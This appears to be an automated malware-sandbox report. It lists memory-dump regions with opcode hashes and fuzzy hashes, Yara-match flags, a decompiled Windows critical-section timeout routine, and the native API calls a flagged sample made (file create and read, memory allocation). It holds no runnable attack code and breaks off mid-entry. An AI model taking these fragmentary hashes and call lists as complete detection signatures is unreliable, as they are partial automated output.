                                            • Instruction Fuzzy Hash: BC9002A122100442E10461A944047070045ABE1241F51C016A2145554CC5798C616265
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889c55a9cf082518db51df67a97747eeb550983ea814953bd037bfc93fff856e
                                            • Instruction ID: 06d7d9c674c50a2ff006f560c51217962720b6e6effa1311340fab8b14a097c1
                                            • Opcode Fuzzy Hash: 889c55a9cf082518db51df67a97747eeb550983ea814953bd037bfc93fff856e
                                            • Instruction Fuzzy Hash: 6090027125100802E14171A944046070009BBD0281F91C016A0415554EC6A58A56BBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94fe6ea31e263006f45ac647679df32529c66c61c6f1ee37ced45fa29c1e8583
                                            • Instruction ID: ebed59d52cb70c14e4f6fa4d2d47ef3fdd57c0cf2affd93ad4c73703fd2d0d58
                                            • Opcode Fuzzy Hash: 94fe6ea31e263006f45ac647679df32529c66c61c6f1ee37ced45fa29c1e8583
                                            • Instruction Fuzzy Hash: C59002A1611144435540B1A948044075015BBE1341391C125A0445560CC6B88855A3A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37f9c8f6a76979f34bc2f27809e2c4340875b3789438af8057340ee0fd42572d
                                            • Instruction ID: e8a66a3866275283b5c5a2dd81fad8f2028f918cc65b650ae28cd55e2d7e4647
                                            • Opcode Fuzzy Hash: 37f9c8f6a76979f34bc2f27809e2c4340875b3789438af8057340ee0fd42572d
                                            • Instruction Fuzzy Hash: 2490026131100802E10261A944146070009EBD1385F91C016E1415555DC6758953B272
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9436d785de6b91c6e07f25a31c44dbf15e01e20517b099b561a237fee441e4aa
                                            • Instruction ID: 2e155d62e425868a1460645a54e0040d2b0de316fe544c5320f27c24cc8e50d0
                                            • Opcode Fuzzy Hash: 9436d785de6b91c6e07f25a31c44dbf15e01e20517b099b561a237fee441e4aa
                                            • Instruction Fuzzy Hash: B190026125100C02E14071A984147070006EBD0641F51C015A0015554DC666896577F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d97cd08b367d30182bb42e73d43025c376a26ce669bf24a83481666dbd3dadd7
                                            • Instruction ID: e28642827a43416785a4d8b957a6af02b7f1585ece518beb4faab1e8e8dfc853
                                            • Opcode Fuzzy Hash: d97cd08b367d30182bb42e73d43025c376a26ce669bf24a83481666dbd3dadd7
                                            • Instruction Fuzzy Hash: E990027121144402E14071A9844460B5005BBE0341F51C415E0416554CC6658856A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8476ce7b528ee55d2c3848a2ba379f3b61ffd111065181e8cf93c4ab951838e4
                                            • Instruction ID: d8d68b295620df3a1a6d41a702d9e3d39a5a12114a190f93ea0e5dda0e77fec1
                                            • Opcode Fuzzy Hash: 8476ce7b528ee55d2c3848a2ba379f3b61ffd111065181e8cf93c4ab951838e4
                                            • Instruction Fuzzy Hash: 1D90027121140802E10061A948087470005ABD0342F51C015A5155555EC6B5C8917671
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd1c0f3e61aec9d9548a5172daede7cb4301bc3dbfc8de6a07e09f45007e5d5f
                                            • Instruction ID: 5ceecabb3bab62673639c6e257dfd492f25b8b4645760460312c3fc69020f8b9
                                            • Opcode Fuzzy Hash: bd1c0f3e61aec9d9548a5172daede7cb4301bc3dbfc8de6a07e09f45007e5d5f
                                            • Instruction Fuzzy Hash: FE90026121144842E14062A94804B0F4105ABE1242F91C01DA4147554CC96588556761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e13fe5af8952d338d27388a934fe177193a7c96613566e816ec371b7366d8deb
                                            • Instruction ID: 3de06025486e384155907971600c86c1e9d1be7c502490dc50f4ea8d5fca35a4
                                            • Opcode Fuzzy Hash: e13fe5af8952d338d27388a934fe177193a7c96613566e816ec371b7366d8deb
                                            • Instruction Fuzzy Hash: 6A9002E1211144925500A2A98404B0B4505ABE0241B51C01AE1045560CC5758851A275
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b98315a84ea47f9fc9e1dda5170bc8c2add4a0ea775b6e3f4197b8881bc5498
                                            • Instruction ID: 7d20aa843d60a77bdfea73cc4aec870f842fffb845bb3d7bb07b8e7c3584b116
                                            • Opcode Fuzzy Hash: 1b98315a84ea47f9fc9e1dda5170bc8c2add4a0ea775b6e3f4197b8881bc5498
                                            • Instruction Fuzzy Hash: ED900271A1500412A14071A948146474006BBE0781B55C015A0505554CC9A48A5563E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aaeb65ac84f3058b8ecb17599aaa70c39ed4d84c3b0d4f2a2284097e47536a14
                                            • Instruction ID: f7d0ba43230185b7b4ba6e3c42cbd426a7ae03fcc500692f1faa388be90ab0df
                                            • Opcode Fuzzy Hash: aaeb65ac84f3058b8ecb17599aaa70c39ed4d84c3b0d4f2a2284097e47536a14
                                            • Instruction Fuzzy Hash: F5900265231004021145A5A9060450B0445BBD6391391C019F1407590CC67188656361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3702cc853d76e8865063a73ab573d9eb68453c5cec2a67872d74c9fdd1aafccb
                                            • Instruction ID: 61e33979b81a631d9224d02a604c3fc0b57e65d952445e5494449aba70848585
                                            • Opcode Fuzzy Hash: 3702cc853d76e8865063a73ab573d9eb68453c5cec2a67872d74c9fdd1aafccb
                                            • Instruction Fuzzy Hash: 9A90027121100C02E10461A948046870005ABD0341F51C015A6015655ED6B588917271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4341238e34a5b1f6035cbdff40ab8db6368d91b67c5651a4027ffca68db9182d
                                            • Instruction ID: dfc3092a7df226fbb54ea27655022fc935b9d707fa58536773835844ddc7751a
                                            • Opcode Fuzzy Hash: 4341238e34a5b1f6035cbdff40ab8db6368d91b67c5651a4027ffca68db9182d
                                            • Instruction Fuzzy Hash: F990026161500802E14071A954187070015ABD0241F51D015A0015554DC6A98A5577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cd227b3f518545608885e9e6d26be77ff6e1ee72a26fb0fb345e2ecc3f9558b
                                            • Instruction ID: b24a10645c4cb9ecb399c53896fcb804d35858fdae5aeebc6cff0fb786b4dc19
                                            • Opcode Fuzzy Hash: 1cd227b3f518545608885e9e6d26be77ff6e1ee72a26fb0fb345e2ecc3f9558b
                                            • Instruction Fuzzy Hash: 0790027131100452A500A6E95804A4B4105ABF0341B51D019A4005554CC5A488616261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cb26987f166b0dabd39593faa74dbd53073ae5fc253e7f29e38d7f729c34811
                                            • Instruction ID: ae03cdb2c5708609ffb6a6ed08ff0e0e87dbe11f7caeae4a182706004edd4c1b
                                            • Opcode Fuzzy Hash: 5cb26987f166b0dabd39593faa74dbd53073ae5fc253e7f29e38d7f729c34811
                                            • Instruction Fuzzy Hash: 8E90027121100803E10061A955087070005ABD0241F51D415A0415558DD6A688517261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 339d7c586a39ec42f12256ad024df939a9e1eb824e0cd1dbca0e7dfb015db491
                                            • Instruction ID: f9d967d7cbfba6f7aa5c47d7d96ed2c995f2ccc498c86cd1315f7fa3f03b332e
                                            • Opcode Fuzzy Hash: 339d7c586a39ec42f12256ad024df939a9e1eb824e0cd1dbca0e7dfb015db491
                                            • Instruction Fuzzy Hash: 3C90027521504842E50065A95804A870005ABD0345F51D415A041559CDC6A48861B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 762cfd8517e4bc72adc01c378382dbb76b5c7161756380f11e08d7a37acc6e63
                                            • Instruction ID: 3808f3debf70e8c6ed29ea276d01c9abece97a87e625dc1ca2b54c4647c36806
                                            • Opcode Fuzzy Hash: 762cfd8517e4bc72adc01c378382dbb76b5c7161756380f11e08d7a37acc6e63
                                            • Instruction Fuzzy Hash: AF90026121504842E10065A95408A070005ABD0245F51D015A1055595DC6758851B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e9a07189e32489a85cd5c43d36292439630d7b891d8277d36bc5c97c59787b4
                                            • Instruction ID: 191ff586a0defb436b250658b5f1e3bc0fb4669e64fde3bb9626288f39a890ba
                                            • Opcode Fuzzy Hash: 1e9a07189e32489a85cd5c43d36292439630d7b891d8277d36bc5c97c59787b4
                                            • Instruction Fuzzy Hash: 4390027161500C02E15071A944147470005ABD0341F51C015A0015654DC7A58A5577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d30b4452bd36b3c99e698603c427dc4143121dc216fa67a9ef6addfd1b78d968
                                            • Instruction ID: dc6b35d4e85c3e2489d88af9520c7061fa23af9b6420caa33bba72a717640466
                                            • Opcode Fuzzy Hash: d30b4452bd36b3c99e698603c427dc4143121dc216fa67a9ef6addfd1b78d968
                                            • Instruction Fuzzy Hash: FF90027121504C42E14071A94404A470015ABD0345F51C015A0055694DD6758D55B7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce372514e038d81c33f91635fa1211b389197df5e91443e35a1eb1198f533f60
                                            • Instruction ID: d90b4466c833f240c9e2bb87a7e332b744122facd0e256f83dba661679a246d6
                                            • Opcode Fuzzy Hash: ce372514e038d81c33f91635fa1211b389197df5e91443e35a1eb1198f533f60
                                            • Instruction Fuzzy Hash: 3790027121100C42E10061A94404B470005ABE0341F51C01AA0115654DC665C8517661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: eff0b79daba4bca8b677a82a383d5880162da6497220737180b9e1bf980ef76e
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E012BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0126CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E012B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E012B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012BFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012BFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012BFE2B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02FE3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FE3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02FE860D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(02FE3D72,5E972F65,FFFFFFFF,02FE3A31,?,?,02FE3D72,?,02FE3A31,FFFFFFFF,5E972F65,02FE3D72,?,00000000), ref: 02FE86B5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02FD2D11,00002000,00003000,00000004), ref: 02FE87D9
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02FE3D50,?,?,02FE3D50,00000000,FFFFFFFF), ref: 02FE8715
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b70aec1e14546081681772a184eaea0f4f25cb266018b1ecde1851f6c85a47dc
                                            • Instruction ID: 26338d62bc514d1bd904aec87f1b1a4a0aa89b7b120d3e67d9e871266e2d5a2d
                                            • Opcode Fuzzy Hash: b70aec1e14546081681772a184eaea0f4f25cb266018b1ecde1851f6c85a47dc
                                            • Instruction Fuzzy Hash: 9C90027135119802E110A15994047160495A7D1245F51C811A0814559D87D588E17162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f747bc667a2574a98ea961c6f67a335b9cd75064eddf82caaae048680db129e2
                                            • Instruction ID: f8c2ad3c7842c4e7ef1925a5e9e79cd7d26c070035ea33b839aa7a5418653381
                                            • Opcode Fuzzy Hash: f747bc667a2574a98ea961c6f67a335b9cd75064eddf82caaae048680db129e2
                                            • Instruction Fuzzy Hash: 5D90026935305402E180B159640861A0495A7D1246F91D815A0005559CCA5588B96361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51a2234699c599de230dbda0158dae55fad2b737935be872087524dc88696e5d
                                            • Instruction ID: e9235b0ccbc4fdb54f1819a687170e2b1b24e6b0a05c788c8a98cc314f6e2313
                                            • Opcode Fuzzy Hash: 51a2234699c599de230dbda0158dae55fad2b737935be872087524dc88696e5d
                                            • Instruction Fuzzy Hash: C990027134509C42E140B1595404A5604A5A7D0349F51C411A0054695D97658DA5B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7d3951189a2a4ab387aa51e7f8b364eefabdae4edc172afc62674c3b26c7647a
                                            • Instruction ID: 6db2ba379eaf12fa7850fbc31a2dd2dadc41749cad5a67969c5cedc43795850f
                                            • Opcode Fuzzy Hash: 7d3951189a2a4ab387aa51e7f8b364eefabdae4edc172afc62674c3b26c7647a
                                            • Instruction Fuzzy Hash: 7190026135185442E200A5695C14B170495A7D0347F51C515A0144555CCA5588B16561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a8072fde1a9e15662c0fceaf5c2d7636dc17237a1fb729dbe94b415e6120f205
                                            • Instruction ID: ce514452d859d8ba9d5385bf736a3c96ebaea6bb15632efda4b5ac1f5bb1ee42
                                            • Opcode Fuzzy Hash: a8072fde1a9e15662c0fceaf5c2d7636dc17237a1fb729dbe94b415e6120f205
                                            • Instruction Fuzzy Hash: D490027134105C02E180B159540465A0495A7D1345F91C415A0015655DCB558AA977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0da4b13d4fb556df4ebe16ef6fc2d00d1c187075ec7b20dac0ef8db097e60735
                                            • Instruction ID: eed56753d6267da5982ee81d4ec34840f87a88779c6f83891b3bb5beb25682b1
                                            • Opcode Fuzzy Hash: 0da4b13d4fb556df4ebe16ef6fc2d00d1c187075ec7b20dac0ef8db097e60735
                                            • Instruction Fuzzy Hash: F290027134105C42E100A1595404B560495A7E0345F51C416A0114655D8755C8A17561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0087bdbb45682c841e6602db2340c7f657a9d60fb2e727fe2d51d20028751273
                                            • Instruction ID: 69bfaaf40895f8a18709bbfe8bfb53c0a5f6faa5542a5eac3d670797b3fae108
                                            • Opcode Fuzzy Hash: 0087bdbb45682c841e6602db2340c7f657a9d60fb2e727fe2d51d20028751273
                                            • Instruction Fuzzy Hash: BA9002713410DC02E110A159940475A0495A7D0345F55C811A4414659D87D588E17161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7512da8f7dd0eeca5da54f50d4b0550385ac2f75d2b1e9246a026b0489bc0460
                                            • Instruction ID: 72918eca3343ee1cb496dd76461ea25668672427bf4f65170508de168e8bf52f
                                            • Opcode Fuzzy Hash: 7512da8f7dd0eeca5da54f50d4b0550385ac2f75d2b1e9246a026b0489bc0460
                                            • Instruction Fuzzy Hash: DD900475351054031105F55D170451704D7F7D53D5351C431F1005551CD771CCF17171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 733119bacb6cdd605636d354828e9dd9936ef5892fcb04d3ce9ed3e5f4edf3b9
                                            • Instruction ID: c2629c1338bc902320ccbbed32767c5db26e3d68548961a1ec8516f3395fe1d8
                                            • Opcode Fuzzy Hash: 733119bacb6cdd605636d354828e9dd9936ef5892fcb04d3ce9ed3e5f4edf3b9
                                            • Instruction Fuzzy Hash: A09002B134105802E140B15954047560495A7D0345F51C411A5054555E87998DE576A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d12810f08dd03937e0468ada6973e64f56ba250980eb1f8ca43778ea5aff68fb
                                            • Instruction ID: 3ec32d10fe1d2354f1955eacf11d1fa0c79c643b8b711bec01fa16e2c89e3273
                                            • Opcode Fuzzy Hash: d12810f08dd03937e0468ada6973e64f56ba250980eb1f8ca43778ea5aff68fb
                                            • Instruction Fuzzy Hash: 9A9002A1342054035105B1595414626449AA7E0245B51C421E1004591DC66588E17165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 04026c4132e69e24675bbda8db567e8c48d78c2d8691ffa22f06515cb8b42c42
                                            • Instruction ID: 1f2e5ffe076a5a20bbf875730ebda21d7a3a4e7872f5e5d34d6d34211c79e0fb
                                            • Opcode Fuzzy Hash: 04026c4132e69e24675bbda8db567e8c48d78c2d8691ffa22f06515cb8b42c42
                                            • Instruction Fuzzy Hash: A99002A138105842E100A1595414B160495E7E1345F51C415E1054555D8759CCA27166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fac78e13f16dc15222128715efb6c2a46df8577744d891ffd1a2a70fbff3eb0d
